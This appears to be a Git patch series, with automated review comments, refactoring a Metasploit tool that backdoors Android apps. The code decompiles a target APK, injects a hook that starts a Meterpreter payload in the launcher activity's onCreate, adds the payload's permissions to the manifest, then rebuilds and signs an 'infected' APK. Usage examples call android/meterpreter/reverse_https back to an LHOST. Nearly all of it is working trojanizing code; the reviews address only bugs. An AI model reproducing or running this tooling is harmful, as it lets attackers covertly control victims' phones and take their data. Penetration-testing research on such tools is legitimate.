@@ -50,133 +50,133 @@ end # pick the injection point def scrape_files_for_launcher_activity(tempdir) - smali_files||=[] - Dir.glob("#{tempdir}/original/smali*/**/*.smali") do |file| - checkFile=File.read(file) - if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") - smali_files << file - smalifile = file - activitysmali = checkFile - end - end - i=0 - print "[*] Please choose from one of the following:\n" - smali_files.each{|s_file| - print "[+] Hook point ",i,": ",s_file,"\n" - i+=1 - } - hook=-1 - while (hook < 0 || hook>i) - print "\nHook: " - hook = STDIN.gets.chomp.to_i - end - i=0 - smalifile="" - activitysmali="" - smali_files.each{|s_file| - if (i==hook) - checkFile=File.read(s_file) - smalifile=s_file - activitysmali = checkFile - break - end - i+=1 - } - return [smalifile,activitysmali] + smali_files||=[] + Dir.glob("#{tempdir}/original/smali*/**/*.smali") do |file| + checkFile=File.read(file) + if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") + smali_files << file + smalifile = file + activitysmali = checkFile + end + end + i=0 + print "[*] Please choose from one of the following:\n" + smali_files.each{|s_file| + print "[+] Hook point ",i,": ",s_file,"\n" + i+=1 + } + hook=-1 + while (hook < 0 || hook>i) + print "\nHook: " + hook = STDIN.gets.chomp.to_i + end + i=0 + smalifile="" + activitysmali="" + smali_files.each{|s_file| + if (i==hook) + checkFile=File.read(s_file) + smalifile=s_file + activitysmali = checkFile + break + end + i+=1 + } + return [smalifile,activitysmali] end def fix_manifest(tempdir) - payload_permissions=[] + payload_permissions=[] - #Load payload's permissions - File.open("#{tempdir}/payload/AndroidManifest.xml","r"){|file| - k=File.read(file) - payload_manifest=Nokogiri::XML(k) - permissions = payload_manifest.xpath("//manifest/uses-permission") - for permission in permissions - name=permission.attribute("name") - payload_permissions << name.to_s - end - } + #Load payload's permissions + 
File.open("#{tempdir}/payload/AndroidManifest.xml","rb"){|file| + k=File.read(file) + payload_manifest=Nokogiri::XML(k) + permissions = payload_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + payload_permissions << name.to_s + end + } - original_permissions=[] - apk_mani="" + original_permissions=[] + apk_mani="" - #Load original apk's permissions - File.open("#{tempdir}/original/AndroidManifest.xml","r"){|file2| - k=File.read(file2) - apk_mani=k - original_manifest=Nokogiri::XML(k) - permissions = original_manifest.xpath("//manifest/uses-permission") - for permission in permissions - name=permission.attribute("name") - original_permissions << name.to_s - end - } + #Load original apk's permissions + File.open("#{tempdir}/original/AndroidManifest.xml","rb"){|file2| + k=File.read(file2) + apk_mani=k + original_manifest=Nokogiri::XML(k) + permissions = original_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + original_permissions << name.to_s + end + } - #Get permissions that are not in original APK - add_permissions=[] - for permission in payload_permissions - if !(original_permissions.include? permission) - print "[*] Adding #{permission}\n" - add_permissions << permission - end - end + #Get permissions that are not in original APK + add_permissions=[] + for permission in payload_permissions + if !(original_permissions.include? permission) + print "[*] Adding #{permission}\n" + add_permissions << permission + end + end - inject=0 - new_mani="" - #Inject permissions in original APK's manifest - for line in apk_mani.split("\n") - if (line.include? 
"uses-permission" and inject==0) - for permission in add_permissions - new_mani << ''+"\n" - end - new_mani << line+"\n" - inject=1 - else - new_mani << line+"\n" - end - end - File.open("#{tempdir}/original/AndroidManifest.xml", "w") {|file| file.puts new_mani } + inject=0 + new_mani="" + #Inject permissions in original APK's manifest + for line in apk_mani.split("\n") + if (line.include? "uses-permission" and inject==0) + for permission in add_permissions + new_mani << ''+"\n" + end + new_mani << line+"\n" + inject=1 + else + new_mani << line+"\n" + end + end + File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts new_mani } end apkfile = ARGV[0] -unless(apkfile && File.readable?(apkfile)) - puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" - exit(1) +unless apkfile && File.readable?(apkfile) + $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n" + $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" + exit(1) end jarsigner = run_cmd("jarsigner") -unless(jarsigner != nil) - puts "[-] jarsigner not found. If it's not in your PATH, please add it.\n" - exit(1) +unless jarsigner != nil + $stderr.puts "[-] jarsigner not found. If it's not in your PATH, please add it.\n" + exit(1) end apktool = run_cmd("apktool -version") -unless(apktool != nil) - puts "[-] apktool not found. If it's not in your PATH, please add it.\n" - exit(1) +unless apktool != nil + $stderr.puts "[-] apktool not found. 
If it's not in your PATH, please add it.\n" + exit(1) end apk_v = Gem::Version.new(apktool) -unless(apk_v >= Gem::Version.new('2.0.1')) - puts "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" - exit(1) +unless apk_v >= Gem::Version.new('2.0.1') + $stderr.puts "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" + exit(1) end begin - msfvenom_opts = ARGV[1,ARGV.length] - opts="" - msfvenom_opts.each{|x| - opts+=x - opts+=" " - } + msfvenom_opts = ARGV[1,ARGV.length] + opts="" + msfvenom_opts.each{|x| + opts+=x + opts+=" " + } rescue - puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" - puts "[-] Error parsing msfvenom options. Exiting.\n" - exit(1) + $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n" + $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" + $stderr.puts "[-] Error parsing msfvenom options. Exiting.\n" + exit(1) end #Create temporary directory where work will be done @@ -185,12 +185,12 @@ tempdir = Dir.mktmpdir print "[*] Generating msfvenom payload..\n" msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "msfvenom")) res = run_cmd("#{msfvenom_path} -f raw #{opts} -o #{tempdir}/payload.apk 2>&1") -if res.downcase.include?("invalid" || "error") - puts res - exit(1) +if res.downcase.include?("error") + $stderr.puts res + exit(1) end -print "[*] Signing payload..\n" +print "[*] Signing payload..\n" run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{tempdir}/payload.apk androiddebugkey") run_cmd("cp #{apkfile} #{tempdir}/original.apk") 
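Review bot: The change to `if res.downcase.include?("error")` in the `@@ -185,12 +185,12 @@` hunk is a behaviour change inside a commit described as lint cleanup, and it trades one blind spot for another. The old `"invalid" || "error"` only ever matched "invalid"; the new form only matches "error". If both words were meant to be caught, use `if res =~ /invalid|error/i`. Matching on output text is fragile either way, and having `run_cmd` expose the exit status would be the more reliable failure signal.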
@@ -199,7 +199,7 @@ print "[*] Decompiling orignal APK..\n" run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") print "[*] Decompiling payload APK..\n" run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") - + f = File.open("#{tempdir}/original/AndroidManifest.xml") amanifest = Nokogiri::XML(f) f.close @@ -209,17 +209,17 @@ print "[*] Locating onCreate() hook..\n" launcheractivity = find_launcher_activity(amanifest) smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" begin - activitysmali = File.read(smalifile) + activitysmali = File.read(smalifile) rescue Errno::ENOENT - print "[!] Unable to find correct hook automatically\n" - begin - results=scrape_files_for_launcher_activity(tempdir) - smalifile=results[0] - activitysmali=results[1] - rescue - puts "[-] Error finding launcher activity. Exiting" - exit(1) - end + print "[!] Unable to find correct hook automatically\n" + begin + results=scrape_files_for_launcher_activity(tempdir) + smalifile=results[0] + activitysmali=results[1] + rescue + $stderr.puts "[-] Error finding launcher activity. Exiting" + exit(1) + end end print "[*] Copying payload files..\n" @@ -229,7 +229,7 @@ activitycreate = ';->onCreate(Landroid/os/Bundle;)V' payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" hookedsmali = activitysmali.gsub(activitycreate, payloadhook) print "[*] Loading ",smalifile," and injecting payload..\n" -File.open(smalifile, "w") {|file| file.puts hookedsmali } +File.open(smalifile, "wb") {|file| file.puts hookedsmali } injected_apk=apkfile.split(".")[0] + "_backdoored.apk" print "[*] Poisoning the manifest with meterpreter permissions..\n" 
@@ -237,7 +237,7 @@ fix_manifest(tempdir) print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n" run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") -print "[*] Signing #{injected_apk} ..\n" +print "[*] Signing #{injected_apk} ..\n" run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") FileUtils.remove_entry tempdir From ad0ff2ea2f9f158deafa3b03ca656b1d5b9e3cb0 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 22 Dec 2015 05:21:13 +0000 Subject: [PATCH 10/71] move to tools/exploit --- tools/{ => exploit}/apk_backdoor.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename tools/{ => exploit}/apk_backdoor.rb (100%) diff --git a/tools/apk_backdoor.rb b/tools/exploit/apk_backdoor.rb similarity index 100% rename from tools/apk_backdoor.rb rename to tools/exploit/apk_backdoor.rb From d1ed363a94a0e93252d1e9c634d5355595935f74 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 22 Dec 2015 06:10:15 +0000 Subject: [PATCH 11/71] clean up apk_backdoor.rb --- tools/exploit/apk_backdoor.rb | 18 ++++++++++-------- 1 file changed, 10 insertions(+), 8 deletions(-) diff --git a/tools/exploit/apk_backdoor.rb b/tools/exploit/apk_backdoor.rb index 18401b380d..c0d461d6d6 100755 --- a/tools/exploit/apk_backdoor.rb +++ b/tools/exploit/apk_backdoor.rb @@ -11,6 +11,10 @@ require 'fileutils' require 'optparse' require 'open3' +def usage + $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n" + $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" +end def run_cmd(cmd) begin @@ -142,8 +146,7 @@ end apkfile = ARGV[0] unless apkfile && File.readable?(apkfile) - $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" + usage exit(1) end 
@@ -173,9 +176,8 @@ begin opts+=" " } rescue - $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" $stderr.puts "[-] Error parsing msfvenom options. Exiting.\n" + usage exit(1) end @@ -183,7 +185,7 @@ end tempdir = Dir.mktmpdir print "[*] Generating msfvenom payload..\n" -msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "msfvenom")) +msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "..", "msfvenom")) res = run_cmd("#{msfvenom_path} -f raw #{opts} -o #{tempdir}/payload.apk 2>&1") if res.downcase.include?("error") $stderr.puts res @@ -230,14 +232,14 @@ payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/ hookedsmali = activitysmali.gsub(activitycreate, payloadhook) print "[*] Loading ",smalifile," and injecting payload..\n" File.open(smalifile, "wb") {|file| file.puts hookedsmali } -injected_apk=apkfile.split(".")[0] + "_backdoored.apk" +injected_apk = apkfile.sub('.apk', '_backdoored.apk') print "[*] Poisoning the manifest with meterpreter permissions..\n" fix_manifest(tempdir) -print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n" +print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") -print "[*] Signing #{injected_apk} ..\n" +print "[*] Signing #{injected_apk}\n" run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") FileUtils.remove_entry tempdir From d2cc32a38942c73f03818f6fcf606c6449615bf7 Mon Sep 17 00:00:00 2001 
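Review bot: In the `@@ -230,14 +232,14 @@` hunk, `apkfile.sub('.apk', '_backdoored.apk')` returns the input unchanged when the path contains no literal `.apk` (for example an upper-case extension), so the later `apktool b -o #{injected_apk}` would write over the input file. It also replaces the first occurrence rather than the extension, which rewrites a directory component such as `my.apk.d/app.apk`. Deriving the name from the basename avoids both: `injected_apk = File.join(File.dirname(apkfile), File.basename(apkfile, '.*') + '_backdoored.apk')`. The path is then interpolated unquoted into a shell string passed to `run_cmd`, so a file name with spaces or shell metacharacters is interpreted by the shell rather than treated as one argument.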
From: Tim Date: Tue, 22 Dec 2015 14:37:57 +0000 Subject: [PATCH 12/71] integrate apk_backdoor with msfvenom --- lib/msf/core/payload_generator.rb | 11 +- tools/exploit/apk_backdoor.rb | 197 ++++++++++++++++-------------- 2 files changed, 110 insertions(+), 98 deletions(-) diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index b4c436e561..3a209a41dc 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb @@ -305,9 +305,14 @@ module Msf # @return [String] A string containing the bytes of the payload in the format selected def generate_payload if platform == "java" or arch == "java" or payload.start_with? "java/" - p = generate_java_payload - cli_print "Payload size: #{p.length} bytes" - p + raw_payload = generate_java_payload + cli_print "Payload size: #{raw_payload.length} bytes" + raw_payload + elsif payload.start_with? "android/" + cli_print "Using template: #{template}" + raw_payload = generate_raw_payload + cli_print "Payload size: #{raw_payload.length} bytes" + raw_payload else raw_payload = generate_raw_payload raw_payload = add_shellcode(raw_payload) diff --git a/tools/exploit/apk_backdoor.rb b/tools/exploit/apk_backdoor.rb index c0d461d6d6..fd6e2ca56d 100755 --- a/tools/exploit/apk_backdoor.rb +++ b/tools/exploit/apk_backdoor.rb 
@@ -144,105 +144,112 @@ def fix_manifest(tempdir) File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts new_mani } end -apkfile = ARGV[0] -unless apkfile && File.readable?(apkfile) - usage - exit(1) -end - -jarsigner = run_cmd("jarsigner") -unless jarsigner != nil - $stderr.puts "[-] jarsigner not found. If it's not in your PATH, please add it.\n" - exit(1) -end - -apktool = run_cmd("apktool -version") -unless apktool != nil - $stderr.puts "[-] apktool not found. If it's not in your PATH, please add it.\n" - exit(1) -end - -apk_v = Gem::Version.new(apktool) -unless apk_v >= Gem::Version.new('2.0.1') - $stderr.puts "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" - exit(1) -end - -begin - msfvenom_opts = ARGV[1,ARGV.length] - opts="" - msfvenom_opts.each{|x| - opts+=x - opts+=" " - } -rescue - $stderr.puts "[-] Error parsing msfvenom options. Exiting.\n" - usage - exit(1) -end - -#Create temporary directory where work will be done -tempdir = Dir.mktmpdir - -print "[*] Generating msfvenom payload..\n" -msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "..", "msfvenom")) -res = run_cmd("#{msfvenom_path} -f raw #{opts} -o #{tempdir}/payload.apk 2>&1") -if res.downcase.include?("error") - $stderr.puts res - exit(1) -end - -print "[*] Signing payload..\n" -run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{tempdir}/payload.apk androiddebugkey") - -run_cmd("cp #{apkfile} #{tempdir}/original.apk") - -print "[*] Decompiling orignal APK..\n" -run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") -print "[*] Decompiling payload APK..\n" -run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") - -f = File.open("#{tempdir}/original/AndroidManifest.xml") -amanifest = Nokogiri::XML(f) -f.close - -print "[*] Locating onCreate() hook..\n" - -launcheractivity = 
find_launcher_activity(amanifest) -smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" -begin - activitysmali = File.read(smalifile) -rescue Errno::ENOENT - print "[!] Unable to find correct hook automatically\n" - begin - results=scrape_files_for_launcher_activity(tempdir) - smalifile=results[0] - activitysmali=results[1] - rescue - $stderr.puts "[-] Error finding launcher activity. Exiting" +def backdoor_payload(apkfile, raw_payload) + unless apkfile && File.readable?(apkfile) + usage exit(1) end + + jarsigner = run_cmd("jarsigner") + unless jarsigner != nil + $stderr.puts "[-] jarsigner not found. If it's not in your PATH, please add it.\n" + exit(1) + end + + apktool = run_cmd("apktool -version") + unless apktool != nil + $stderr.puts "[-] apktool not found. If it's not in your PATH, please add it.\n" + exit(1) + end + + apk_v = Gem::Version.new(apktool) + unless apk_v >= Gem::Version.new('2.0.1') + $stderr.puts "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" + exit(1) + end + + #Create temporary directory where work will be done + tempdir = Dir.mktmpdir + + File.open("#{tempdir}/payload.apk", "wb") {|file| file.puts raw_payload } + FileUtils.cp apkfile, "#{tempdir}/original.apk" + + print "[*] Decompiling original APK..\n" + run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") + print "[*] Decompiling payload APK..\n" + run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") + + f = File.open("#{tempdir}/original/AndroidManifest.xml") + amanifest = Nokogiri::XML(f) + f.close + + print "[*] Locating onCreate() hook..\n" + + launcheractivity = find_launcher_activity(amanifest) + smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" + begin + activitysmali = File.read(smalifile) + rescue Errno::ENOENT + print "[!] 
Unable to find correct hook automatically\n" + begin + results=scrape_files_for_launcher_activity(tempdir) + smalifile=results[0] + activitysmali=results[1] + rescue + $stderr.puts "[-] Error finding launcher activity. Exiting" + exit(1) + end + end + + print "[*] Copying payload files..\n" + FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") + FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" + activitycreate = ';->onCreate(Landroid/os/Bundle;)V' + payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" + hookedsmali = activitysmali.gsub(activitycreate, payloadhook) + print "[*] Loading ",smalifile," and injecting payload..\n" + File.open(smalifile, "wb") {|file| file.puts hookedsmali } + injected_apk = apkfile.sub('.apk', '_backdoored.apk') + + print "[*] Poisoning the manifest with meterpreter permissions..\n" + fix_manifest(tempdir) + + print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" + run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") + print "[*] Signing #{injected_apk}\n" + run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") + + FileUtils.remove_entry tempdir + + puts "[+] Infected file #{injected_apk} ready.\n" end -print "[*] Copying payload files..\n" -FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") -FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" -activitycreate = ';->onCreate(Landroid/os/Bundle;)V' -payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" -hookedsmali = activitysmali.gsub(activitycreate, payloadhook) -print "[*] Loading ",smalifile," and 
injecting payload..\n" -File.open(smalifile, "wb") {|file| file.puts hookedsmali } -injected_apk = apkfile.sub('.apk', '_backdoored.apk') +if __FILE__ == $0 + begin + msfvenom_opts = ARGV[1,ARGV.length] + opts="" + msfvenom_opts.each{|x| + opts+=x + opts+=" " + } + rescue + $stderr.puts "[-] Error parsing msfvenom options. Exiting.\n" + usage + exit(1) + end -print "[*] Poisoning the manifest with meterpreter permissions..\n" -fix_manifest(tempdir) + print "[*] Generating msfvenom payload..\n" + msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "..", "msfvenom")) + msfvenom_command = "#{msfvenom_path} -f raw #{opts}" + begin + stdin, stdout, stderr = Open3.popen3(msfvenom_command) + payload = stdout.read + msfvenom_output = stderr.read + backdoor_payload(ARGV[0], payload) + rescue Errno::ENOENT + $stderr.puts msfvenom_output + exit(1) + end -print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" -run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") -print "[*] Signing #{injected_apk}\n" -run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") - -FileUtils.remove_entry tempdir - -puts "[+] Infected file #{injected_apk} ready.\n" +end From 662a6dfd53f0c3d72dbec3b21cee0e1211ff2d8a Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 22 Dec 2015 14:47:55 +0000 Subject: [PATCH 13/71] =?UTF-8?q?=C2=AF\=5F(=E3=83=84)=5F/=C2=AF?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- lib/msf/core/payload/apk.rb | 225 ++++++++++++++++++++++++++++++ lib/msf/core/payload_generator.rb | 2 + 2 files changed, 227 insertions(+) create mode 100644 lib/msf/core/payload/apk.rb diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb new file mode 100644 index 0000000000..bdfdb4421d --- /dev/null +++ b/lib/msf/core/payload/apk.rb 
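Review bot: In the new `if __FILE__ == $0` block, `msfvenom_output` is assigned only after `Open3.popen3` returns, so it is still nil in the `rescue Errno::ENOENT` branch and nothing useful is printed. The child's exit status is never checked either, so a failed msfvenom run hands an empty `payload` to `backdoor_payload` and the error text on stderr is dropped. `payload, msfvenom_output, status = Open3.capture3(msfvenom_command)` followed by `unless status.success?` covers both cases, and also avoids the pipe deadlock that can occur when stdout is read to the end before stderr. Separately, `file.puts raw_payload` in `backdoor_payload` appends a newline to binary data; `file.write raw_payload` keeps the bytes unchanged.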
@@ -0,0 +1,225 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'tmpdir' +require 'nokogiri' +require 'fileutils' +require 'optparse' +require 'open3' + +module Msf::Payload::Apk + + def usage + print_error "Usage: #{$0} [target.apk] [msfvenom options]\n" + print_error "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" + end + + def run_cmd(cmd) + begin + stdin, stdout, stderr = Open3.popen3(cmd) + return stdout.read + stderr.read + rescue Errno::ENOENT + return nil + end + end + + # Find the activity that is opened when you click the app icon + def find_launcher_activity(amanifest) + package = amanifest.xpath("//manifest").first['package'] + activities = amanifest.xpath("//activity|//activity-alias") + for activity in activities + activityname = activity.attribute("name") + category = activity.search('category') + unless category + next + end + for cat in category + categoryname = cat.attribute('name') + if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') + activityname = activityname.to_s + unless activityname.start_with?(package) + activityname = package + activityname + end + return activityname + end + end + end + end + + # If XML parsing of the manifest fails, recursively search + # the smali code for the onCreate() hook and let the user + # pick the injection point + + def scrape_files_for_launcher_activity(tempdir) + smali_files||=[] + Dir.glob("#{tempdir}/original/smali*/**/*.smali") do |file| + checkFile=File.read(file) + if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") + smali_files << file + smalifile = file + activitysmali = checkFile + end + end + i=0 + print_status "[*] Please choose from one of the following:\n" + smali_files.each{|s_file| + print_status "[+] Hook point ",i,": ",s_file,"\n" + i+=1 + } + hook=-1 + while (hook < 0 || hook>i) + print_status "\nHook: " + hook = STDIN.gets.chomp.to_i + end + i=0 + smalifile="" + 
activitysmali="" + smali_files.each{|s_file| + if (i==hook) + checkFile=File.read(s_file) + smalifile=s_file + activitysmali = checkFile + break + end + i+=1 + } + return [smalifile,activitysmali] + end + + def fix_manifest(tempdir) + payload_permissions=[] + + #Load payload's permissions + File.open("#{tempdir}/payload/AndroidManifest.xml","rb"){|file| + k=File.read(file) + payload_manifest=Nokogiri::XML(k) + permissions = payload_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + payload_permissions << name.to_s + end + } + + original_permissions=[] + apk_mani="" + + #Load original apk's permissions + File.open("#{tempdir}/original/AndroidManifest.xml","rb"){|file2| + k=File.read(file2) + apk_mani=k + original_manifest=Nokogiri::XML(k) + permissions = original_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + original_permissions << name.to_s + end + } + + #Get permissions that are not in original APK + add_permissions=[] + for permission in payload_permissions + if !(original_permissions.include? permission) + print_status "[*] Adding #{permission}\n" + add_permissions << permission + end + end + + inject=0 + new_mani="" + #Inject permissions in original APK's manifest + for line in apk_mani.split("\n") + if (line.include? "uses-permission" and inject==0) + for permission in add_permissions + new_mani << ''+"\n" + end + new_mani << line+"\n" + inject=1 + else + new_mani << line+"\n" + end + end + File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts new_mani } + end + + def backdoor_payload(apkfile, raw_payload) + unless apkfile && File.readable?(apkfile) + usage + exit(1) + end + + jarsigner = run_cmd("jarsigner") + unless jarsigner != nil + print_error "[-] jarsigner not found. 
If it's not in your PATH, please add it.\n" + exit(1) + end + + apktool = run_cmd("apktool -version") + unless apktool != nil + print_error "[-] apktool not found. If it's not in your PATH, please add it.\n" + exit(1) + end + + apk_v = Gem::Version.new(apktool) + unless apk_v >= Gem::Version.new('2.0.1') + print_error "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" + exit(1) + end + + #Create temporary directory where work will be done + tempdir = Dir.mktmpdir + + File.open("#{tempdir}/payload.apk", "wb") {|file| file.puts raw_payload } + FileUtils.cp apkfile, "#{tempdir}/original.apk" + + print_status "[*] Decompiling original APK..\n" + run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") + print_status "[*] Decompiling payload APK..\n" + run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") + + f = File.open("#{tempdir}/original/AndroidManifest.xml") + amanifest = Nokogiri::XML(f) + f.close + + print_status "[*] Locating onCreate() hook..\n" + + launcheractivity = find_launcher_activity(amanifest) + smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" + begin + activitysmali = File.read(smalifile) + rescue Errno::ENOENT + print_status "[!] Unable to find correct hook automatically\n" + begin + results=scrape_files_for_launcher_activity(tempdir) + smalifile=results[0] + activitysmali=results[1] + rescue + print_error "[-] Error finding launcher activity. 
Exiting" + exit(1) + end + end + + print_status "[*] Copying payload files..\n" + FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") + FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" + activitycreate = ';->onCreate(Landroid/os/Bundle;)V' + payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" + hookedsmali = activitysmali.gsub(activitycreate, payloadhook) + print_status "[*] Loading ",smalifile," and injecting payload..\n" + File.open(smalifile, "wb") {|file| file.puts hookedsmali } + injected_apk = apkfile.sub('.apk', '_backdoored.apk') + + print_status "[*] Poisoning the manifest with meterpreter permissions..\n" + fix_manifest(tempdir) + + print_status "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" + run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") + print_status "[*] Signing #{injected_apk}\n" + run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") + + FileUtils.remove_entry tempdir + + puts "[+] Infected file #{injected_apk} ready.\n" + end +end + + diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index 3a209a41dc..b051bbc97e 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb @@ -1,4 +1,5 @@ # -*- coding: binary -*- +require 'msf/core/payload/apk' require 'active_support/core_ext/numeric/bytes' module Msf @@ -310,6 +311,7 @@ module Msf raw_payload elsif payload.start_with? "android/" cli_print "Using template: #{template}" + raw_payload = generate_raw_payload cli_print "Payload size: #{raw_payload.length} bytes" raw_payload From eeea4bde9d68256b092e643caa3ed83538495ff3 Mon Sep 17 00:00:00 2001 
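Review bot: Every external tool call in the new `lib/msf/core/payload/apk.rb` builds a shell string with interpolated paths (`run_cmd("apktool b -o #{injected_apk} #{tempdir}/original")`, the `jarsigner` lines), and `injected_apk` derives from the caller-supplied `apkfile`. A path containing spaces, `;` or backticks is therefore parsed by the shell. Letting `run_cmd` take an argument vector (`def run_cmd(*cmd)` with `Open3.popen3(*cmd)`) removes the shell from the path; the `~/.android/debug.keystore` argument would then need `File.expand_path`. This code is now a library mixin, so the `exit(1)` calls in `backdoor_payload` terminate whatever process includes it and skip `FileUtils.remove_entry tempdir`; raising an exception and cleaning up in an `ensure` would be safer. `print_status "[+] Hook point ",i,": ",s_file,"\n"` still passes several arguments, as it did to `print`; whether `print_status` accepts that is not visible in this patch.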
